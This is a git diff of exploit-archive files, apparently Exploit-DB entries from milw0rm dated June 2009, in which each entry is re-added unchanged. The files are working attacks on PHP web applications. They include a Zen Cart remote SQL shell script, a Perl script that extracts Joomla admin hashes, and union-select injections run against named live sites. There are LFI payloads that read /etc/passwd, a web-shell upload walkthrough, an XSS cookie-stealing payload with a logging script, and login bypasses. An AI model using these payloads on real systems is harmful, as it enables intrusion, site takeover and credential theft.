+	 * @example $this->reset()
+	 * 
+	 */
+	function reset($func='')
+	{
+		switch($func)
+		{
+			case 'header':
+			$this->header = array('');
+			break;
+				
+			case 'cookie':
+			$this->cookie = array('');
+			break;
+				
+			default:
+			$this->cookiejar = '';
+			$this->header = array('');
+			$this->cookie = array('');
+			$this->allowredirection = '';
+			break;
+		}
+	}
+}
+
+?>
+
+# milw0rm.com [2009-06-23]
diff --git a/platforms/php/webapps/9005.py b/platforms/php/webapps/9005.py
index f8f06e22b..ed74f6ab4 100755
--- a/platforms/php/webapps/9005.py
+++ b/platforms/php/webapps/9005.py
@@ -1,58 +1,58 @@
-#!/usr/bin/python
-
-#
-# ------- Zen Cart 1.3.8 Remote SQL Execution
-# http://www.zen-cart.com/
-# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
-# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
-#
-# BlackH :)
-#
-
-#
-# Notes: must have admin/sqlpatch.php enabled
-#
-# clean the database :
-#	DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
-#	DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';
-
-import urllib, urllib2, re, sys
-
-a,b = sys.argv,0
-
-def option(name, need = 0):
-	global a, b
-	for param in sys.argv:
-		if(param == '-'+name): return str(sys.argv[b+1])
-		b = b + 1
-	if(need):
-		print '\n#error', "-"+name, 'parameter required'
-		exit(1)
-
-if (len(sys.argv) < 2):
-	print """
-=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
-========================================================================
-|                  BlackH <Bl4ck.H@gmail.com>                          |
-========================================================================
-|                                                                      |
-| $system> python """+sys.argv[0]+""" -url <url>                                 |
-| Param: <url>      ex: http://victim.com/site (no slash)              |
-|                                                                      |
-| Note: blind "injection"                                              |
-========================================================================
-	"""
-	exit(1)
-	
-url, trick = option('url', 1), "/password_forgotten.php"
-
-while True:
-	cmd = raw_input('sql@jah$ ') 
-	if (cmd == "exit"): exit(1)
-	req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
-	if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
-		print '>> success (', cmd, ")"
-	else:
-		print '>> failed, be sure to end with ; (', cmd, ")"
-
-# milw0rm.com [2009-06-23]
+#!/usr/bin/python
+
+#
+# ------- Zen Cart 1.3.8 Remote SQL Execution
+# http://www.zen-cart.com/
+# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
+# A new version (1.3.8a) is avaible on http://www.zen-cart.com/
+#
+# BlackH :)
+#
+
+#
+# Notes: must have admin/sqlpatch.php enabled
+#
+# clean the database :
+#	DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
+#	DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';
+
+import urllib, urllib2, re, sys
+
+a,b = sys.argv,0
+
+def option(name, need = 0):
+	global a, b
+	for param in sys.argv:
+		if(param == '-'+name): return str(sys.argv[b+1])
+		b = b + 1
+	if(need):
+		print '\n#error', "-"+name, 'parameter required'
+		exit(1)
+
+if (len(sys.argv) < 2):
+	print """
+=____________ Zen Cart 1.3.8 Remote SQL Execution Exploit  ____________=
+========================================================================
+|                  BlackH <Bl4ck.H@gmail.com>                          |
+========================================================================
+|                                                                      |
+| $system> python """+sys.argv[0]+""" -url <url>                                 |
+| Param: <url>      ex: http://victim.com/site (no slash)              |
+|                                                                      |
+| Note: blind "injection"                                              |
+========================================================================
+	"""
+	exit(1)
+	
+url, trick = option('url', 1), "/password_forgotten.php"
+
+while True:
+	cmd = raw_input('sql@jah$ ') 
+	if (cmd == "exit"): exit(1)
+	req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
+	if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
+		print '>> success (', cmd, ")"
+	else:
+		print '>> failed, be sure to end with ; (', cmd, ")"
+
+# milw0rm.com [2009-06-23]
diff --git a/platforms/php/webapps/9009.txt b/platforms/php/webapps/9009.txt
index 05b88f3d2..0ff0751f0 100755
--- a/platforms/php/webapps/9009.txt
+++ b/platforms/php/webapps/9009.txt
@@ -1,17 +1,17 @@
-Authentication Bypass in BASE version 1.2.4 and prior - Insecure
-Cookie Handling Vulnerability
-
---------------------------------------------
-
-Author.: Tim Medin
-
-Contact: nidem.nidem [at] gmail [d0t] com
-
--------------------------------------------------------------------------------------------------
-
-Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e;
-path=/";
-
-Note: After creating cookie go to http://[website]/base_main.php
-
-# milw0rm.com [2009-06-24]
+Authentication Bypass in BASE version 1.2.4 and prior - Insecure
+Cookie Handling Vulnerability
+
+--------------------------------------------
+
+Author.: Tim Medin
+
+Contact: nidem.nidem [at] gmail [d0t] com
+
+-------------------------------------------------------------------------------------------------
+
+Exploit: javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e;
+path=/";
+
+Note: After creating cookie go to http://[website]/base_main.php
+
+# milw0rm.com [2009-06-24]
diff --git a/platforms/php/webapps/9010.txt b/platforms/php/webapps/9010.txt
index 711aaf65b..2dd97e080 100755
--- a/platforms/php/webapps/9010.txt
+++ b/platforms/php/webapps/9010.txt
@@ -1,20 +1,20 @@
-|-->Glossword 1.8.11 LFI
-|-->CMS INFORMATION:
-|                                                   
-|-->WEB: http://code.google.com/p/glossword/                              
-|-->DOWNLOAD: http://code.google.com/p/glossword/downloads/list                                  
-|-->DESCRIPTION: Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia.            
-|                                               
-|  CMS VULNERABILITY:                                       
-|                                               
-|-->TESTED ON: firefox 3                                           
-|-->DORK: "Powered by Glossword 1.8.11" , "Powered by Glossword 1.8.6" ...                                           
-|-->CATEGORY: LOCAL FILE INCLUSION (LFI)               
-|-->AFFECT VERSION: all > 1.8.11                           
-|-->Author: t0fx                                                                    
-|-->GREETZ: europasecurity.org // security-shell.ws // str0ke // elitexbytes // Pig le marabou belge // p3lo // Sh0ck le congolais
-
-|-->Exploit :
-| http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00
-
-# milw0rm.com [2009-06-24]
+|-->Glossword 1.8.11 LFI
+|-->CMS INFORMATION:
+|                                                   
+|-->WEB: http://code.google.com/p/glossword/                              
+|-->DOWNLOAD: http://code.google.com/p/glossword/downloads/list                                  
+|-->DESCRIPTION: Glossword is a system written in PHP to create and publish online multilingual dictionary, glossary, or encyclopedia.            
+|                                               
+|  CMS VULNERABILITY:                                       
+|                                               
+|-->TESTED ON: firefox 3                                           
+|-->DORK: "Powered by Glossword 1.8.11" , "Powered by Glossword 1.8.6" ...                                           
+|-->CATEGORY: LOCAL FILE INCLUSION (LFI)               
+|-->AFFECT VERSION: all > 1.8.11                           
+|-->Author: t0fx                                                                    
+|-->GREETZ: europasecurity.org // security-shell.ws // str0ke // elitexbytes // Pig le marabou belge // p3lo // Sh0ck le congolais
+
+|-->Exploit :
+| http://www.website.fr/glossword_path/index.php?t=../../../../../../../../../../../../../etc/passwd%00
+
+# milw0rm.com [2009-06-24]
diff --git a/platforms/php/webapps/9011.txt b/platforms/php/webapps/9011.txt
index e8d5fa14b..f304e09bf 100755
--- a/platforms/php/webapps/9011.txt
+++ b/platforms/php/webapps/9011.txt
@@ -1,39 +1,39 @@
-##############################################################
-|
-|                                   Joomla Component [com_pinboard] Remote File Upload Vulnerability
-|
-|    Author : ViRuSMaN
-|
-|    Contact : v-.m@live.com
-|
-|    Home : Islam-Attack.CoM , HackTeach.OrG
-|
-##############################################################
-|
-| Dork inurl:com_pinboard
-|
-| Exploite :
-|
-| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload
-|
-|    or
-|
-| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm
-|
-| [#] click on the photo in Top Of Left
-|
-| [#] upload your shell shell.php.jpg  &  Confirmer SVP
-|
-| [#] Pwd Your Shell
-|  
-|      target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg
-|
-|      Or
-|
-|      target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg  
-|
-##############################################################
-|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's  
-##############################################################
-
-# milw0rm.com [2009-06-24]
+##############################################################
+|
+|                                   Joomla Component [com_pinboard] Remote File Upload Vulnerability
+|
+|    Author : ViRuSMaN
+|
+|    Contact : v-.m@live.com
+|
+|    Home : Islam-Attack.CoM , HackTeach.OrG
+|
+##############################################################
+|
+| Dork inurl:com_pinboard
+|
+| Exploite :
+|
+| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload
+|
+|    or
+|
+| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm
+|
+| [#] click on the photo in Top Of Left
+|
+| [#] upload your shell shell.php.jpg  &  Confirmer SVP
+|
+| [#] Pwd Your Shell
+|  
+|      target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg
+|
+|      Or
+|
+|      target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg  
+|
+##############################################################
+|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's  
+##############################################################
+
+# milw0rm.com [2009-06-24]
diff --git a/platforms/php/webapps/9014.txt b/platforms/php/webapps/9014.txt
index 4ee845ab3..894402407 100755
--- a/platforms/php/webapps/9014.txt
+++ b/platforms/php/webapps/9014.txt
@@ -1,50 +1,50 @@
-PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability
-bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
-
-contact: sys-project[at]hotmail.com
-website: http://www.hack0wn.com/
-
-- download: http://sourceforge.net/project/showfiles.php?group_id=186100
-
-~ [XSS]
-
-  The forum allowed insert javascript code and html code.
-
-  PoC:
-  "><h1>0wned</h1>
-  "><script>alert("JosS b0x");</script>
-  
-  -----------  
-
-  Cookie Stealing:
-  <script>window.location=Â’http://127.0.0.1/stealing.php?cookie=Â’+document.cookie</script>
-
-  stealing.php
-  <?php
-  $archivo = fopen('log.htm','a');
-  $cookie = $_GET['c'];
-  $usuario = $_GET['id']; 
-  $ip = getenv ('REMOTE_ADDR');
-  $re = $HTTPREFERRER;
-
-  $fecha=date("j F, Y, g:i a");
-  fwrite($archivo, '<hr>USER and PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> 
-
-  IP: ' .$ip. '<br> Date and Time: ' .$fecha. '</hr>');
-  fclose($archivo);
-  ?>
-
-~ [BLIND]
-
-  PoC:
-  /index.php?module=forum&show=thread&id=1 and 1=2 [False]
-  /index.php?module=forum&show=thread&id=1 and 1=1 [True]
-
-  /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5
-  /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4
-
-
-
-__h0__
-
-# milw0rm.com [2009-06-24]
+PHPEcho CMS 2.0-rc3 (forum) XSS Cookie Stealing / Blind Vulnerability
+bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
+
+contact: sys-project[at]hotmail.com
+website: http://www.hack0wn.com/
+
+- download: http://sourceforge.net/project/showfiles.php?group_id=186100
+
+~ [XSS]
+
+  The forum allowed insert javascript code and html code.
+
+  PoC:
+  "><h1>0wned</h1>
+  "><script>alert("JosS b0x");</script>
+  
+  -----------  
+
+  Cookie Stealing:
+  <script>window.location=Â’http://127.0.0.1/stealing.php?cookie=Â’+document.cookie</script>
+
+  stealing.php
+  <?php
+  $archivo = fopen('log.htm','a');
+  $cookie = $_GET['c'];
+  $usuario = $_GET['id']; 
+  $ip = getenv ('REMOTE_ADDR');
+  $re = $HTTPREFERRER;
+
+  $fecha=date("j F, Y, g:i a");
+  fwrite($archivo, '<hr>USER and PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br> 
+
+  IP: ' .$ip. '<br> Date and Time: ' .$fecha. '</hr>');
+  fclose($archivo);
+  ?>
+
+~ [BLIND]
+
+  PoC:
+  /index.php?module=forum&show=thread&id=1 and 1=2 [False]
+  /index.php?module=forum&show=thread&id=1 and 1=1 [True]
+
+  /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=5
+  /index.php?module=forum&show=thread&id=1 AND SUBSTRING(@@version,1,1)=4
+
+
+
+__h0__
+
+# milw0rm.com [2009-06-24]
diff --git a/platforms/php/webapps/9015.txt b/platforms/php/webapps/9015.txt
index 2c15cf8ba..874766e09 100755
--- a/platforms/php/webapps/9015.txt
+++ b/platforms/php/webapps/9015.txt
@@ -1,19 +1,19 @@
-LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability
-bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
-
-contact: sys-project[at]hotmail.com
-website: http://www.hack0wn.com/
-
-- download: http://sourceforge.net/project/showfiles.php?group_id=251474
-
-[smarty.php]
- define("SMARTY_DIR", $cwd."/smarty/");
- require_once(SMARTY_DIR."/Smarty.class.php");
-
-PoC:
- [php.ini] register_globals= On
- http://localhost/locms/smarty.php?cwd=../../../../../../../../../../../../boot.ini%00
-
-Greetz: YEnH4ckEr, str0ke and spanish hackers!
-
-# milw0rm.com [2009-06-24]
+LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability
+bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
+
+contact: sys-project[at]hotmail.com
+website: http://www.hack0wn.com/
+
+- download: http://sourceforge.net/project/showfiles.php?group_id=251474
+
+[smarty.php]
+ define("SMARTY_DIR", $cwd."/smarty/");
+ require_once(SMARTY_DIR."/Smarty.class.php");
+
+PoC:
+ [php.ini] register_globals= On
+ http://localhost/locms/smarty.php?cwd=../../../../../../../../../../../../boot.ini%00
+
+Greetz: YEnH4ckEr, str0ke and spanish hackers!
+
+# milw0rm.com [2009-06-24]
diff --git a/platforms/php/webapps/9016.txt b/platforms/php/webapps/9016.txt
index d2c4f4001..c409d4d2f 100755
--- a/platforms/php/webapps/9016.txt
+++ b/platforms/php/webapps/9016.txt
@@ -1,41 +1,41 @@
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-Joomla Component com_amocourse (catid) SQL-injection Vulnerability
-++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-
-###################################################
-[+] Author        :  Chip D3 Bi0s
-[+] Email         :  chipdebios[alt+64]gmail.com
-[+] Greetz        :  d4n1ux + x_jeshua + eCORE + rayok3nt
-[+] Vulnerability :  SQL injection 
-
-###################################################
-
-
-
-Example:
-http://localHost/path//index.php?option=com_amocourse&task=view&view=category&catid=n[SQL code]
-
-n = catid valid
-
-[SQL code]
-+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
-
-
-Demo Live (1)
-http://www.kaieden.com/joomla/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
-
-
-Demo Live Mambo (2)
-http://www.tangotherapy.co.uk/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
-
-
-
-
-
-
-+++++++++++++++++++++++++++++++++++++++
-#[!] Produced in South America
-+++++++++++++++++++++++++++++++++++++++
-
-# milw0rm.com [2009-06-24]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Joomla Component com_amocourse (catid) SQL-injection Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+
+###################################################
+[+] Author        :  Chip D3 Bi0s
+[+] Email         :  chipdebios[alt+64]gmail.com
+[+] Greetz        :  d4n1ux + x_jeshua + eCORE + rayok3nt
+[+] Vulnerability :  SQL injection 
+
+###################################################
+
+
+
+Example:
+http://localHost/path//index.php?option=com_amocourse&task=view&view=category&catid=n[SQL code]
+
+n = catid valid
+
+[SQL code]
++union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
+
+
+Demo Live (1)
+http://www.kaieden.com/joomla/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
+
+
+Demo Live Mambo (2)
+http://www.tangotherapy.co.uk/index.php?option=com_amocourse&task=view&view=category&catid=29+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12+from+jos_users--
+
+
+
+
+
+
++++++++++++++++++++++++++++++++++++++++
+#[!] Produced in South America
++++++++++++++++++++++++++++++++++++++++
+
+# milw0rm.com [2009-06-24]
diff --git a/platforms/php/webapps/9017.txt b/platforms/php/webapps/9017.txt
index ce8390e7f..d6750f206 100755
--- a/platforms/php/webapps/9017.txt
+++ b/platforms/php/webapps/9017.txt
@@ -1,37 +1,37 @@
-#!/usr/bin/perl -w
-# Joomla Component (com_pinboard) Remote SQL Injection
-########################################
-#[*] By : Stack
-#POc
-#http://site/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,username,8,9,10%20from%20jos_users--
-#http://site/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,password,8,9,10%20from%20jos_users--
-#Demo
-#http://munimartin.at/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,username,8,9,10%20from%20jos_users--
-#http://munimartin.at/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,password,8,9,10%20from%20jos_users--
-########################################
-system("color 02");
-print "\t\t############################################################\n\n";
-print "\t\t#       Joomla Component (com_pinboard) Remote SQL Injection    #\n\n";
-print "\t\t#                             by Stack                        #\n\n";
-print "\t\t############################################################\n\n";
-use LWP::UserAgent;
-die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
-system("color f");
-$user="username";
-$pass="password";
-$tab="jos_users";
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $ARGV[0] . "/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48+union+select+1,2,3,4,5,6,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),8,9,10+from+".$tab."--";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content;
-if ($answer =~ /<user>(.*?)<user>/){
-        print "\nBrought to you by v4-team.com...\n";
-        print "\n[+] Admin User : $1";
-}
-if ($answer =~/<pass>(.*?)<pass>/){print "\n[+] Admin Hash : $1\n\n";
-print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}
-else{print "\n[-] Exploit Failed...\n";}
-
-# milw0rm.com [2009-06-25]
+#!/usr/bin/perl -w
+# Joomla Component (com_pinboard) Remote SQL Injection
+########################################
+#[*] By : Stack
+#POc
+#http://site/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,username,8,9,10%20from%20jos_users--
+#http://site/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,password,8,9,10%20from%20jos_users--
+#Demo
+#http://munimartin.at/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,username,8,9,10%20from%20jos_users--
+#http://munimartin.at/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48%20union%20select%201,2,3,4,5,6,password,8,9,10%20from%20jos_users--
+########################################
+system("color 02");
+print "\t\t############################################################\n\n";
+print "\t\t#       Joomla Component (com_pinboard) Remote SQL Injection    #\n\n";
+print "\t\t#                             by Stack                        #\n\n";
+print "\t\t############################################################\n\n";
+use LWP::UserAgent;
+die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
+system("color f");
+$user="username";
+$pass="password";
+$tab="jos_users";
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $ARGV[0] . "/index.php?option=com_pinboard&Itemid=35&action=showpic&task=-48+union+select+1,2,3,4,5,6,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,112,97,115,115,62)),8,9,10+from+".$tab."--";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content;
+if ($answer =~ /<user>(.*?)<user>/){
+        print "\nBrought to you by v4-team.com...\n";
+        print "\n[+] Admin User : $1";
+}
+if ($answer =~/<pass>(.*?)<pass>/){print "\n[+] Admin Hash : $1\n\n";
+print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}
+else{print "\n[-] Exploit Failed...\n";}
+
+# milw0rm.com [2009-06-25]
diff --git a/platforms/php/webapps/9019.txt b/platforms/php/webapps/9019.txt
index d13ed6736..93b7c2021 100755
--- a/platforms/php/webapps/9019.txt
+++ b/platforms/php/webapps/9019.txt
@@ -1,154 +1,154 @@
-***********************************************************************************************
-***********************************************************************************************
-**	       										     **
-**  											     **
-**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
-**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
-** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
-**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
-**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
-**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
-   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
-**							                                     **
-**    											     **
-**                            VIVA SPAIN!...GANAREMOS EL MUNDIAL!...o.O                      **
-**					 PROUD TO BE SPANISH!				     **
-**											     **
-***********************************************************************************************
-***********************************************************************************************
-
-----------------------------------------------------------------------------------------------
-|       	   	          SQL INJECTION VULNERABILITY		      	             |
-|--------------------------------------------------------------------------------------------|
-|                              |     AlumniServer v-1.0.1     |		                     |
-|  CMS INFORMATION:	        ------------------------------	                             |
-|										             |
-|-->WEB: http://www.alumniserver.net/			          	                     |
-|-->DOWNLOAD: http://www.alumniserver.net/		         	                     |
-|-->DEMO: N/A   	     			    					     |
-|-->CATEGORY: CMS/Education								     |
-|-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools   |
-|		and companies. Services for usersinclude profile page,...	     	     |
-|-->RELEASED: 2009-06-11								     |
-|											     |
-|  CMS VULNERABILITY:									     |
-|											     |
-|-->TESTED ON: firefox 3								     |
-|-->DORK: "AlumniServer project"					                     |
-|-->CATEGORY: AUTH-BYPASS (SQLi)				                             |
-|-->AFFECT VERSION: CURRENT				 			             |
-|-->Discovered Bug date: 2009-06-16							     |
-|-->Reported Bug date: 2009-06-16							     |
-|-->Fixed bug date: N/A									     |
-|-->Info patch (????): N/A					  			     |
-|-->Author: YEnH4ckEr									     |
-|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
-|-->WEB/BLOG: N/A									     |
-|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
-|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
-----------------------------------------------------------------------------------------------
-
-
-
-#####################
-////////////////////
-
-AUTH-BYPASS (SQLi):
-
-////////////////////
-#####################
-
-
-
-<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>
-
-
-
------------
-VULN FILE:
------------
-
-
-
-Path --> [HOME_PATH]/login.php
-Lines --> 26, 32, 72
-
-
-//Note: requestVar is a function against LFI and XSS mainly, 
-//avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars.
-
-
-...
-
-26:  $email=requestVar('login','',true);
-
-...
-
-32:  $pwd=requestVar('password','',true);
-
-...
-
-72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE '".md5($pwd)."') LIMIT 1",$dbh); <-- Vuln line
-
-...
-
-
------------
-EXPLOITS:
------------
-
-
-
-[!!!] Case-1: If only one user (rarely)...
-
-
-~~~> E-Mail=y3nh4ck3r@gmail.com') OR 1=1 /*
-~~~> Password=nothing
-
-
-[!!!] Case-2: If more users...
-
-
-[++] Note: Search mail for admin (http://[HOST]/[PATH]/Imprint.php):
-
-
-~~~> E-Mail=[real_admin_mail]')/*
-~~~> Password=nothing
-
-
-[++] Note: Search for first or second name.
-[++] Note: AdminGn, AdminSn By default. Not use id because it's generated randomly. With a registered user 
-	is easy to get necessary information.
-
-
-~~~> E-Mail=y3nh4ck3r@gmail.com') OR gn='AdminGn' /*
-~~~> Password=nothing
-
-
-[!!!] Case-3: If admin is a hidden user...
-
-
-~~~> E-Mail=y3nh4ck3r@gmail.com') OR hideuser='y' /*
-~~~> Password=nothing
-
-
-
-
-<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
-
-
-
-
-##############################################################################
-##############################################################################
-##**************************************************************************##
-##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
-##**************************************************************************##
-##--------------------------------------------------------------------------##
-##**************************************************************************##
-## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
-##**************************************************************************##
-##############################################################################
-##############################################################################
-
-# milw0rm.com [2009-06-25]
+***********************************************************************************************
+***********************************************************************************************
+**	       										     **
+**  											     **
+**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
+**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
+** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
+**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
+**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
+**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
+   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
+**							                                     **
+**    											     **
+**                            VIVA SPAIN!...GANAREMOS EL MUNDIAL!...o.O                      **
+**					 PROUD TO BE SPANISH!				     **
+**											     **
+***********************************************************************************************
+***********************************************************************************************
+
+----------------------------------------------------------------------------------------------
+|       	   	          SQL INJECTION VULNERABILITY		      	             |
+|--------------------------------------------------------------------------------------------|
+|                              |     AlumniServer v-1.0.1     |		                     |
+|  CMS INFORMATION:	        ------------------------------	                             |
+|										             |
+|-->WEB: http://www.alumniserver.net/			          	                     |
+|-->DOWNLOAD: http://www.alumniserver.net/		         	                     |
+|-->DEMO: N/A   	     			    					     |
+|-->CATEGORY: CMS/Education								     |
+|-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools   |
+|		and companies. Services for usersinclude profile page,...	     	     |
+|-->RELEASED: 2009-06-11								     |
+|											     |
+|  CMS VULNERABILITY:									     |
+|											     |
+|-->TESTED ON: firefox 3								     |
+|-->DORK: "AlumniServer project"					                     |
+|-->CATEGORY: AUTH-BYPASS (SQLi)				                             |
+|-->AFFECT VERSION: CURRENT				 			             |
+|-->Discovered Bug date: 2009-06-16							     |
+|-->Reported Bug date: 2009-06-16							     |
+|-->Fixed bug date: N/A									     |
+|-->Info patch (????): N/A					  			     |
+|-->Author: YEnH4ckEr									     |
+|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
+|-->WEB/BLOG: N/A									     |
+|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
+|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
+----------------------------------------------------------------------------------------------
+
+
+
+#####################
+////////////////////
+
+AUTH-BYPASS (SQLi):
+
+////////////////////
+#####################
+
+
+
+<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>
+
+
+
+-----------
+VULN FILE:
+-----------
+
+
+
+Path --> [HOME_PATH]/login.php
+Lines --> 26, 32, 72
+
+
+//Note: requestVar is a function against LFI and XSS mainly, 
+//avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars.
+
+
+...
+
+26:  $email=requestVar('login','',true);
+
+...
+
+32:  $pwd=requestVar('password','',true);
+
+...
+
+72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE '".md5($pwd)."') LIMIT 1",$dbh); <-- Vuln line
+
+...
+
+
+-----------
+EXPLOITS:
+-----------
+
+
+
+[!!!] Case-1: If only one user (rarely)...
+
+
+~~~> E-Mail=y3nh4ck3r@gmail.com') OR 1=1 /*
+~~~> Password=nothing
+
+
+[!!!] Case-2: If more users...
+
+
+[++] Note: Search mail for admin (http://[HOST]/[PATH]/Imprint.php):
+
+
+~~~> E-Mail=[real_admin_mail]')/*
+~~~> Password=nothing
+
+
+[++] Note: Search for first or second name.
+[++] Note: AdminGn, AdminSn By default. Not use id because it's generated randomly. With a registered user 
+	is easy to get necessary information.
+
+
